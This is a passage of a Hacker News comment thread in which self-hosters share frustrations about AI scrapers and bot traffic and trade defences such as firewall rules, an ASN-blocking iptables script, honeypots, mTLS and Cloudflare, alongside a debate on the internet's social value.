           | aledalgrande wrote:
           | For your use case have you thought about VPN into your local
           | network, via e.g. a Synology box? It's pretty cool and easy
           | to set up.
        
         | UltraSane wrote:
         | The public internet is a incredibly hostile infosec environment
         | and you pretty much HAVE to block requests based on real time
         | threat data like https://www.misp-project.org/feeds/
         | 
         | It is fun to create honeypots for things like SSH and RDP and
         | automatically block the source IPs
        
         | fragmede wrote:
         | The Internet is _not_ safe, and Let 's Encrypt shows us this.
         | They're a great service, but the moment you put something on
         | the Internet and then give it a SSL/TLS certificate, evil will
         | hammer your site to trying to find a WordPress admin page.
        
         | _the_inflator wrote:
         | I can confirm.
         | 
         | My then PageRank 6 Business Website got attacked non stop
         | starting around the 2008.
         | 
         | At this time my log files exploded as well: the Script Kiddies
         | entered the arena.
         | 
         | At the time the first tools leaked into the public to scan for
         | IP ranges and check websites for certain attack vectors.
         | 
         | I miss the era between Compuserve, AOL around 1995 till 2008.
         | 
         | Web Rings, Technorati, fantastic Fan Sites before Wikipedia -
         | wholesome.
         | 
         | Term: Script Kiddies
         | https://en.wikipedia.org/wiki/Script_kiddie
        
           | esseph wrote:
           | By 1995 most of the script kiddies I knew were also co-
           | mingling with 0day authors and warez distributors.
        
       | quaintdev wrote:
       | I do not have a solution for blog like this but if you are self
       | hosting I recommend enabling mTLS on your reverse proxy.
       | 
       | I'm doing this for a dozen services hosted at home. The reverse
       | proxy just drops the request if user does not present a
       | certificate. My devices which can present cert can connect
       | seamlessly. It's a one time setup but once done you can forget
       | about it.
        
         | SoftTalker wrote:
         | That's fine if you're hosting stuff just for yourself but not
         | really practical if you're hosting stuff you want others to be
         | able to read, such as a blog.
        
           | lukevp wrote:
           | You can mTLS to CloudFlare too, if you're not one of the
           | anti-CloudFlare people. Then all traffic drops besides
           | traffic that passes thru CF and the mTLS handshake prevents
           | bypassing CF.
        
             | BehindTheMath wrote:
             | You don't need mTLS for that. Just block all IPs beside for
             | Cloudflare's ranges.
        
         | bogwog wrote:
         | Wireguard is much better. Not only is it easier to set
         | up/maintain, it even works on Android and iOS. I used to use
         | client authentication for my private git server, but getting
         | client certs installed on every client browser or app was a
         | pain in the ass, and not even possible for some mobile
         | browsers.
         | 
         | Today, my entire network of self hosted stuff exists in a
         | personal wireguard VPN. My firewall blocks everything except
         | the wireguard port (even SSH).
        
       | cyp0633 wrote:
       | My Gitea instance also encountered aggressive scraping some days
       | ago, but with highly distributed IP & ASN & geolocation, each of
       | which is well below the rate of a human visitor. I assume Anubis
       | will not stop the massively funded AI companies, so I'm
       | considering poisoning the scrapers with garbage code, only
       | targeting blind scrapers, of course.
        
         | mrweasel wrote:
         | Sadly we're now seeing services that sell proxy services that
         | allows you to scape from a wide variety of residential IPs,
         | some even goes so far as to labels their IPs as "ethically
         | sources".
        
       | skopje wrote:
       | sad but hosting static content like his site in a cloud would
       | save him a headache. i know i know, "do it yourself" and all but
       | if that is his path he knows the price. maybe i am wrong and do
       | not understand the problem but it seems like he is asking for a
       | headache.
       | 
       | edit: words
        
         | Nifty3929 wrote:
         | I think the author would agree, and is in fact the point of his
         | post.
         | 
         | The only way to solve these problems is using some large hosted
         | platform where they have the resources to constantly be
         | managing these issues. This would solve their problem.
         | 
         | But isn't it sad that we can't host our own websites anymore,
         | like many of us used to? It was never easy, but it's nearly
         | impossible now and this is only one reason.
        
           | skopje wrote:
           | i think it has been a hard to host a site since about 2007. i
           | stopped then because it is too much work to keep it safe.
           | even worse now but it has always been extra work since search
           | engines. maybe the OP is just getting older and wants to
           | spend time with his kids and not play with nginx haha.
        
       | zdc1 wrote:
       | I wonder if you can have a chain of "invisible" links on your
       | site that a normal person wouldn't see or click. The links can go
       | page A -> page B -> page C, where a request for C = instant IP
       | ban.
        
         | chrisweekly wrote:
         | IP addresses from scrapers are innumerable and in constant
         | rotation.
        
         | SkiFire13 wrote:
         | Scrapers nowadays can use residential and mobile IPs, so
         | banning by IP, even if actual malicious requests are coming
         | from them, can also prevent actual unrelated people from
         | accessing your service.
        
           | SoftTalker wrote:
           | Unless you're running a very popular service, unlikely that a
           | random residential IP would be both compromised by a
           | malicious VPN and also trying to access your site
           | legitimately.
        
             | arbol wrote:
             | Lots of people have chrome extensions installed that use
             | their connection like proxy so this is more common than you
             | think
        
               | SoftTalker wrote:
               | Can you provide any examples of these extensions? I'm not
               | doubting you, just curious.
        
               | arbol wrote:
               | There's one mentioned here:
               | https://www.bleepingcomputer.com/news/security/data-
               | stealing...
               | 
               | Anyone who owns a chrome extension with 50k+ installs is
               | regularly asked to sell it to people (myself included).
               | The people who buy the extensions try to monetize them
               | any way they can, like proxying traffic for malicious
               | scrapers / attacks.
        
             | esseph wrote:
             | Botnets are massive these days.
             | 
             | Also a lot of big companies are paying for residential
             | "proxies" to scrape traffic from for AI.
        
           | theoreticalmal wrote:
           | How can a scraper get a mobile IP address?
        
             | arbol wrote:
             | Just one of many offering this service
             | https://brightdata.com/proxy-types/mobile-proxies
        
         | Habgdnv wrote:
         | I self host and I have something like this but more obvious: i
         | wrote a web service that talks to my mikrotik via API and add
         | the IP of the requester to the block list with a 30 day timeout
         | (configurable ofc). It hostname is "bot-ban-
         | me.myexamplesite.com" and it is like a normal site in my
         | reverse proxy. So when I request a cert this hostname is in the
         | cert, and in the first few minutes i can catch lots of bad
         | apples. I do not expect anyone to ever type this. I do not
         | mention the address or anything anywhere, so the only way to
         | land there is to watch the CT logs.
        
         | trescenzi wrote:
         | There was an article just yesterday which detailed doing this
         | as not in order to ban but in order to waste time. You can also
         | zip bomb people which is entertaining but probably not super
         | effective.
         | 
         | https://herman.bearblog.dev/messing-with-bots/
         | 
         | https://news.ycombinator.com/item?id=45935729
        
         | wibbily wrote:
         | I do something like this. Every page gets an invisible link to
         | a honeypot. Click the link, 48hr ban.
         | 
         | Honestly I have no idea how well it works, my logs are still
         | full of bots. *Slow* bots, though. As long as they're not
         | ddosing me I guess it's fine?
        
         | SoftTalker wrote:
         | We do something similar for ssh. If a remote connection tries
         | to log in as "root" or "admin" or any number of other usernames
         | that indicate a probe for vulnerable configurations, that's an
         | insta-ban for that IP address (banned not only for SSH but for
         | everything).
        
       | sequoia wrote:
       | I don't know if there's a simple solution to deploy this but JA3
       | fingerprinting is sometimes used to identify similar _clients_
       | even if they 're spread across IPs:
       | https://engineering.salesforce.com/tls-fingerprinting-with-j...
        
         | arbol wrote:
         | You need to terminate the TLS connection yourself so this
         | prevents people from using DNS proxy, e.g. Cloudflare. Then you
         | have to run a server that has a module that computes the
         | ja3/ja4, e.g. nginx. Even then, it's possible to set your
         | client hello in python/curl/etc. to exactly mirror the JA4 of
         | your chosen browser like Chrome. So ja4 stops basic bots but
         | most seasoned scrapers already implement valid ja4s/ja3s
        
       | petermcneeley wrote:
       | The real internet has yet to be invented.
        
       | zkmon wrote:
       | Common man never had a need for internet or global connectedness.
       | DARPA wanted to push technology to gain upper hand in the world
       | matters. Universities pushed technology to show progress and sell
       | research. Businesses pushed technologies to have more sales. It
       | was kind of acid rain that was caused by the establishments and
       | sold as scented rain.
        
         | wartywhoa23 wrote:
         | This sentiment - along the lines of "the world became too
         | dependent on the Internet", "Internet wasn't a good thing to
         | begin with", "Internet is a threat to national security" etc -
         | has been popping up on HN too often lately, emerged too
         | abruptly and correlates with the recent initiatives to crack
         | down on the Internet too well.
         | 
         | If this is your own opinion and not a part of a psyop to
         | condition people into embracing the death of the Internet as we
         | know it, do you have any solution to propose?
        
           | gchamonlive wrote:
           | You don't need to have a solution to explore a problem in my
           | opinion. OP comment is problematic but for reasons other than
           | not having a proposed solution.
        
         | gchamonlive wrote:
         | > Common man never had a need for internet or global
         | connectedness
         | 
         | That's not how culture evolves. You don't necessarily need to
         | have a problem so that a solution is developed. You can very
         | well have a technology developed for other purposes, or just
         | for exploration sake, and then as this tech exists uses for it
         | start to pop post hoc.
         | 
         | You therefore ignore the immense benefit of access to
         | information that technology has, something that wasn't
         | necessarily a problem for the common man but once its there,
         | the popularization of the access to information, they adapt and
         | grow dependent on it. Just like electricity.
        
           | zkmon wrote:
           | >>immense benefits ??
           | 
           | People with dialup telephones never asked for a smartphone
           | connected to internet. They were just as happy back then or
           | even more happy because phone didn't eat off their time or
           | cause posture problems.
           | 
           | Sure, shopping was slower without amazon website, but not
           | less happy experience back then. Infact homes had less junk
           | and people saved more money
           | 
           | Messaging? sure it makes you spend time with 100 whatsapp
           | groups, where 99% of the people don't know you personally.
           | 
           | It helped companies to sell more of the junk more quickly.
           | 
           | It created bloggers and content creators who lived in an
           | imaginary world thinking that someone really consumes their
           | content.
           | 
           | It created karma beggers who begged globally for likes that
           | are worth nothing.
           | 
           | It created more concentration of wealth at some weird
           | internet companies, which don't solve any of the world
           | problems or basic needs of the people.
           | 
           | And finally it created AI that pumps plastic sewage to fill
           | the internet. There it is, your immensely useful internet.
           | 
           | As if the plastic pollution was not enough in the real world,
           | the internet will be filled with plastic content.
           | 
           | What else did internet give that is immensely helpful?
        
             | wartywhoa23 wrote:
             | You're blaming the hammer for people driving nails into
             | other's heads instead of walls.
             | 
             | A friend of mine, who had a similar opinion on technology,
             | once watched a movie that seemed to reinforce it in his
             | eyes, and tried to persuade me as if it was the ultimate
             | proof that all technology is evil.
             | 
             | The plot depicted a happy small tribe of indigenous people
             | deep in the rainforest, who never ever saw any artifacts of
             | civilization. They never knew war, homicide, or theft.
             | Basically, they knew no evil. Then, one day, a plane flies
             | over and someone frivolously tosses an emptied bottle of
             | Coca-Cola out of the window (sic!). A member of the tribe
             | finds it in the forest and brings back to the village. And,
             | naturally, everyone else wants to get hold of the bottle,
             | because it's so supernatural and attractive. But the guy
             | decides he's the only owner, refuses and then of course
             | kills those who try to get it by force, and all hell breaks
             | loose in no time.
             | 
             | "See", - concludes my friend triumphally, - "the technology
             | brought evil into this innocent tribe!"
             | 
             | "But don't you think that evil already lurked in those
             | people to start with, if they were ready to kill each other
             | for shiny things?" - I asked, quite baffled.
             | 
             | "Oh, come on, so you're just supporting this shit!" was the
             | answer...
        
               | zkmon wrote:
               | You didn't actually refute any of the examples I gave.
               | Show me the benefits of internet which helped equal
               | sharing of the resources of this planet. Show me how
               | internet did not help concentration of power and wealth.
               | Show me how people's attention span and physical spaces
               | are not filled by junk thanks to internet.
        
               | wartywhoa23 wrote:
               | Why refute the examples based on the false premise that
               | it's the medium's fault that it's filled with plastic
               | bullshit (which I'm totally agree with, mind you)?
               | 
               | What's next, blaming electromagnetic field and devices to
               | modulate it for beeing full of propaganda, violence and
               | all kinds of filth the humankind is capable of creating?
               | You find what you seek, and if not, keep turning that
               | damn knob further.
               | 
               | But since you insist, some good frequencies to tune into:
               | 
               | 1) Self-education in whatever field of practical or
               | theoretical knowldege you're interested in;
               | 
               | 2) Seeing a wider picture of the world than your local
               | authorities would like you to (yes, basically seing that
               | all the world's kings are naked, which is the #1 reason
               | why the Internet became such a major pain in the ass for
               | the kings' trade union, so to say);
               | 
               | 3) Being able to work from any location in the world with
               | access to the Internet;
               | 
               | 4) You mentioned selling trash en masse worldwide, but I
               | know enough examples of wonderful things produced by
               | independent people and sold worldwide.
               | 
               | The list could be longer, but I hate doing useless and
               | thankless work.
        
               | zkmon wrote:
               | Thanks for providing some positive examples. But these
               | examples are dwarfed by the negative effects brought in
               | by internet, in my view. Sure, a modulated signal can be
               | used for broadcasting weather report or some propaganda.
               | But the rush to push technology was done mostly by not
               | talking about the negative effects. Same is happening
               | with AI. Sales prospects are the positive benefits
               | driving it. No one want to say that the tiger which they
               | are bringing back to life, because they can, is an enemy
               | of humans.
        
               | wartywhoa23 wrote:
               | I do agree with you that the negative aspects have been
               | overwhelming any remaining good for quite some time, and
               | that's a constant source of mourning for good things
               | which keep succumbing to evil in this world for me.
        
       | xedrac wrote:
       | I run a dedicated firewall/dns box with netfilter rules to rate
       | limit new connections per IP. It looks like I may need to change
       | that to rate limit per /16 subnet...
        
       | bo1024 wrote:
       | I wonder if a proof of work protocol is a viable solution. To GET
       | the page, you have to spend enough electricity to solve a puzzle.
       | The question is whether the threshold could be low enough for
       | typical people on their phones to access the site easily, but
       | high enough that mass scraping is significantly reduced.
        
         | kalavan wrote:
         | There's this paper from 2004: "Proof-of-Work Proves Not to
         | Work": https://www.cl.cam.ac.uk/~rnc1/proofwork.pdf
         | 
         | The conclusion back then was that it's impossible to make a
         | threshold that is both low enough and high enough.
         | 
         | You need some other mechanism that can distinguish bad traffic
         | from good (even if imperfectly), and then adjust the threshold
         | based on it. See, for instance, "Proof of Work can Work":
         | https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
        
           | bo1024 wrote:
           | Thanks for these references! I imagine the numbers would be
           | entirely different in our context (20 years later and web
           | serving, not email sending). And the idea of spammers using
           | bot nets (therefore not paying for computer themselves) would
           | be less relevant to LLM scraping. But I'll try to check for
           | forward references on these.
        
             | kalavan wrote:
             | > And the idea of spammers using bot nets (therefore not
             | paying for computer themselves) would be less relevant to
             | LLM scraping.
             | 
             | It's possible that the services that reward users for
             | running proxies (or are bundled with mobile apps with a
             | notice buried in the license) would also start
             | rewarding/hiding compute services as well. There's
             | currently no money in it because proof-of-work is so rare,
             | but if it changes, their strategy might too.
        
           | beeflet wrote:
           | Good links, but this is just for email and relies on some
           | (admittedly) pretty lofty assumptions
        
         | tonyhart7 wrote:
         | I'am sorry but it literally didnt works as other commenter
         | cited
         | 
         | because if you make the requirement like that, its basically
         | cancel out the other effect
        
         | IshKebab wrote:
         | I feel like it _could_ work. If you think about it, you need
         | the cost to the client to be greater than the cost to the
         | server. As long as that is true the server shouldn 't mind
         | about increased traffic because it's making a profit!
         | 
         | Very crudely if you think that a request costs the server ~10ms
         | of compute time and a phone is 30x slower then you'd need 300ms
         | of client compute time to equal it which seems very reasonable.
         | 
         | The only problem is you would need a cryptocurrency that a)
         | lets you verify tiny chunks of work, and b) can't be done
         | faster than you can do it on a phone using other hardware, and
         | c) lets a client mine money without being to actually spend it
         | ("homomorphic mining"?).
         | 
         | I don't know if anything like that exists but it would be an
         | interesting problem to solve.
        
           | beeflet wrote:
           | The problem is that the attacker isn't using a phone, they
           | are using some type of specialized hardware.
           | 
           | I still think it is possible with some customized variant of
           | RandomX. The server could even make a bit of money by acting
           | as a mining pool by forcing the clients to mine a certain
           | block template. It's just that it would need to be installed
           | as a browser plugin or something, it wouldn't be efficient
           | running within a page.
           | 
           | Also the verification process for RandomX is still pretty
           | intensive. so there is a high minimum bar for where it would
           | be feasible.
        
       | smileson2 wrote:
       | It's probably just time for the web page to die
        
         | zelphirkalt wrote:
         | What do you mean by that? Web pages is the central mechanism,
         | we use to put information on the web. Of course many websites
         | are shitty and could be much simpler to convey their
         | information, without looking crap at all. But the web page in
         | general? Why would we ever get rid of something so useful? And
         | what do you suggest as an alternative?
        
         | ksenzee wrote:
         | ...they said, on a web page.
        
       | cosmicgadget wrote:
       | > Other things I've noticed is increased traffic with Referer
       | headers coming from strange websites such as bioware.com,
       | mcdonalds.com, and microsoft.com
       | 
       | I've been seeing this too, I guess scrapers think they can get
       | through some blockers with a referrer?
        
       | ModernMech wrote:
       | The Internet was a scene, and like all scenes it's done now the
       | corpos have moved in and taken over (because at that point it's
       | just ads and rent extraction in perpetuity). I dunno
       | what/where/when the next tech scene will be, but I do know it's
       | _not_ going to come from Big Tech. See: Metaverse.
        
       | jcalvinowens wrote:
       | Scrapers have constantly been running against my cgit server for
       | the past year, but they're bizarrely polite in my case... 2-3
       | requests per minute.
       | 
       | This whole enterprise is clearly run by exceptionally dumb
       | people, since you can just clone all the code I host there
       | directly from upstreams...
       | [16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/li
       | nux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee
       | 54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
       | [16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linu
       | x/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821
       | bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
       | [16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/li
       | nux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77
       | fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
       | [16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/lin
       | ux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6
       | bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
       | [16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/li
       | nux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173f
       | a619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250ms
        
       | firefoxd wrote:
       | I have been using zipbombs and they were effective to some
       | extent. Then I had the smart idea to write about it on HN [0].
       | The result was a flood of new types of bots that overwhelmed my
       | $6 server. For ~100k daily request, it wasn't sustainable to
       | serve 1 to 10MB payloads.
       | 
       | I've updated my heuristic to only serve the worst offenders, and
       | created honeypots to collect ips and repond with 403s. After a
       | few months, and some other spam tricks I'll keep to myself this
       | time, my traffic is back to something reasonable again.
       | 
       | [0]: https://news.ycombinator.com/item?id=43826798
        
         | tetris11 wrote:
         | There's likely a large market for this kind of thing. Maybe
         | time to spin out a side business and deploy your heuristics to
         | struggling IPs.
         | 
         | Though I have to admit I dont know who your target audience
         | would be. Self-hosting orgs don't tend to be flush with cash
        
       | AaronAPU wrote:
       | Everything good enough to become popular gets swarmed by the
       | teeming masses and then exploited and destroyed.
       | 
       | The only solution seems to be to constantly abandon those things
       | and move on to new frontiers to enjoy until the cycle repeats.
        
       | svara wrote:
       | The Internet has really been an interesting case study for what
       | happens between people when you remove a varying number of layers
       | of social control.
       | 
       | All the way back to the early days of Usenet really.
       | 
       | I would hate to see it but at the same time I feel like the
       | incentives created by the bad actors really push this towards a
       | much more centralized model over time, e.g. one where all traffic
       | provenance must be signed and identified and must flow through a
       | few big networks that enforce laws around that.
        
         | Cosi1125 wrote:
         | "Socialists"* argue for more regulations; "liberals" claim that
         | there should be financial incentives to not do that.
         | 
         | I'm neither. I believe that we should go back to being
         | "tribes"/communities. At least it's a time-tested way to -
         | maybe not prevent, but somewhat allieviate - the tragedy of the
         | commons.
         | 
         | (I'm aware that this is a very poor and naive theory; I'll
         | happily ditch it for a better idea.)
         | 
         | --
         | 
         | *) For the lack of a better word.
        
           | thrance wrote:
           | What would prevent attacks between "tribes"? What would
           | prevent one from taking over the others and sending us back
           | to square one?
        
             | Cosi1125 wrote:
             | Little would prevent attacks by APTs and other powerful
             | groups. (This, btw., is one of the few facets of this
             | problem that technology could help solve.) But a trivial
             | change: a hard requirement to sign up (=send a human-
             | composed message to one of the moderators) to be able to
             | participate (or, in extreme cases, to read the contents)
             | "automagically" stops almost all spam, scrapers (in the
             | extreme case), vandalism, etc. (from my personal experience
             | based on a rather large sample).
             | 
             | I think it's one of the multi-faceted problems where
             | technology (a "moat", "palisade", etc. for your "tribe")
             | should accompany social changes.
        
       | erickhill wrote:
       | I very much relate to the author's sour mood and frustration. I
       | also host a small hobby forum and have experienced the same
       | attacks constantly, and it has gotten especially bad the last
       | couple of years with the rise of AI.
       | 
       | In the early days I put Google Analytics on the site so I could
       | observe traffic trends. Then, we were all forced to start adding
       | certificates to our sites to keep them "safe".
       | 
       | While I think we're all doomed to continue that annual practice
       | or get blocked by browsers, I have often considered removing
       | Google Analytics. Ever since their redesign it is essentially
       | unusable for me now. What benefit does it bring if I can't
       | understand the product anymore?
       | 
       | Last year, in a fit of desperation, I added Cloudflare. This has
       | a brute force "under attack" mode that seems to stop all bots
       | from accessing the site. It puts up a silly "hang on a second,
       | are you human" page before the site loads, but it does seem to
       | work. It is great UX? No, but at least the site isn't getting
       | hammered by various locations in Asia. Cloudflare also let me
       | block entire countries, although that seems to be easily fooled.
       | 
       | I also don't think a lot of the bots/AI crawlers honor the rules
       | set in the robots.txt. It's all an honor system anyway, and they
       | are completely lacking in it.
       | 
       | There need to be some hard and fast rules put in place, somehow,
       | to stop the madness.
        
         | timpera wrote:
         | Cloudflare does work, but it often destroys the experience for
         | legitimate users. On the website I manage, non-technical users
         | were often getting stuck on the Cloudflare captcha, so I ended
         | up removing it.
         | 
         | Then there's also the issue with dependence to US-based
         | services, but that may not be an issue for you.
        
       | mrb wrote:
       | Unpopular opinion: the real source of the problem is not
       | scrapers, but your unoptimized web software. Gitea and Fail2ban
       | are resource hogs in your case, either unoptimized or poorly
       | configured.
       | 
       | My tiny personal web servers can whistand thousands of requests
       | per second, barely breaking a sweat. As a result, none of the
       | bots or scrapers are causing any issue.
       | 
       |  _" The only thing that had immediate effect was sudo iptables -I
       | INPUT -s 47.79.0.0/16 -j DROP"_ Well, by blocking an entire /16
       | range, it is this type of overzealous action that contributes to
       | making the internet experience a bit more mediocre. This is the
       | same thinking that lead me to, for example, not being able to
       | browse homedepot.com from Europe. I am long-term traveling in
       | Europe and like to frequent DIY websites with people posting
       | links to homedepot, but no someone at HD decided that European
       | IPs couldn't access their site, so I and millions of others are
       | locked out. The /16 is an Alibaba AS, and you make the assumption
       | that most of it is malicious, but in reality you don't know. Fix
       | your software, don't blindly block.
        
       | skybrian wrote:
       | Isn't this problem why Cloudflare is popular? You can write your
       | own server, but outsource protecting it from bots.
       | 
       | Perhaps there are better alternatives?
        
       | foo-bar-bat wrote:
       | When ever was the internet a safe haven, from what exactly?
        
         | eimrine wrote:
         | From governments, of course. There were times when criticism of
         | anything and everything was a common and safe practice online.
         | There are very few places where it is possible to keep
         | practicing this now.
        
       | m3047 wrote:
       | Upvoted not because the internet has ever been a safe haven, but
       | for simply taking a moment to document the issue. But then again,
       | I can't even give away a feed of what's bouncing off of my walls,
       | drowning in my moat.
       | 
       | (An Alibaba /16? I block not just 3/8, but every AWS range I can
       | find.)
        
         | zokier wrote:
         | fyi aws have been publishing (since 2014) all their IP ranges
         | in simple json format https://aws.amazon.com/blogs/aws/aws-ip-
         | ranges-json/
         | 
         | I'd hope other major clouds would do the same
        
         | A1kmm wrote:
         | It might be easier to block by ASN rather than hard-coding IP
         | ranges. Something as simple as this in cron every 24 hours will
         | help (adjust the ASNs in the bzgrep to your taste - and couple
         | with occasional persistence so you don't get hit every reboot):
         | 
         | TEMPDIR=$(mktemp -d)
         | 
         | trap 'rm -r "$TEMPDIR"' EXIT
         | 
         | curl https://archive.routeviews.org/oix-route-views/oix-full-
         | snap... -Lo "$TEMPDIR/snapshot.bz2"
         | 
         | bzgrep -e " (15828|213035|400377|399471|210654|46573|211252|629
         | 04|135542|132372|36352|209641|7552|36352|12876|53667|138608|150
         | 393|60781|138607) i" $TEMPDIR/snapshot.bz2 | cut -d" " -f 3 |
         | sort | uniq > $TEMPDIR/badranges
         | 
         | iptables -N BAD_AS || true
         | 
         | iptables -D INPUT -j BAD_AS || true
         | 
         | iptables -A INPUT -j BAD_AS
         | 
         | iptables -F BAD_AS
         | 
         | for ROUTE in $(cat "$TEMPDIR/badranges"); do
         | iptables -A BAD_AS -s $ROUTE -j DROP;
         | 
         | done
        
       | miyuru wrote:
       | If anyone wants the 2000s internet experience for a while, I
       | recommend deploying a website on IPv6-only server.
       | 
       | It will be accessible to only about 50% of the internet, but back
       | then not many people had internet anyway.
        
       | k0tan32 wrote:
       | Some HNers already mentioned that the internet has not been a
       | safe haven for a long time. All these vulnerability scanners and
       | parsers were pinging my localhost servers even in mid 2k. It has
       | just become worse, and even OSS and usually captcha-free places
       | are installing things like Anubis [1].
       | 
       | All of this reminds me of some of Gibson's short stories I read
       | recently and his description of Cyberspace: small corporate
       | islands of protected networks in a hostile sea of sapient AIs
       | ready to burn your brain.
       | 
       | Luckily, LLMs are not there yet, except you can still get your
       | brain burnt from AI slop or polarizing short videos.
       | 
       | [1] - https://anubis.techaro.lol/
        
       | aledalgrande wrote:
       | I wonder how much of the world's compute/electricity is wasted in
       | malicious bots.
        
       | d4rkn0d3z wrote:
       | It's not hard to build an internet that serves the people but
       | nobody will pay you to do it, and if you are so brazen as to do
       | it yourself then you will be investigated, harrassed, arrested,
       | and beaten. Having been visited with every sorrow short of death,
       | you will beg for death.
        
       | Animats wrote:
       | I wonder how much scraper effort is being spent talking to
       | Samsung refrigerators and such.
        
       | phendrenad2 wrote:
       | I have a question about this part:
       | 
       | > moving the entire hosting to CloudFlare that will do it for me
       | ... nor do I want to route my visitors through tracking-enabled
       | USA servers
       | 
       | Isn't there some EU equivalent to CloudFlare he can use?
       | 
       | It's hard to admit, but DDoS mitigation is an essential part of
       | having even a simple website these days.
        
       | singpolyma3 wrote:
       | Yet another story demonstrating why you should not run fail2ban
        
       ___________________________________________________________________
       (page generated 2025-11-16 23:01 UTC)